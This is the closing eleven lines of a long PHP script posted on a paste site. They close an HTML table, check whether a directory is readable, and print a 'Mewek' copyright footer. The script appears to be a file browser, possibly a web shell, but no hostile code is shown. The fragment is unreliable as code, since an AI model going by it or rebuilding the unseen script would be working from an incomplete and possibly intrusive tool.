  2019. }
  2020. echo "</table>";
  2021. if(!is_readable($dir)) {
  2022. //
  2023. } else {
  2024. echo "<hr>";
  2025. }
  2026. echo "<center>Copyright &copy; ".date("Y")." - <a href='' target='_blank'><font color=#4c83af>Mewek</font></a></center>";
  2027. }
  2028. ?>
  2029. </html>
Add Comment
Please, Sign In to add comment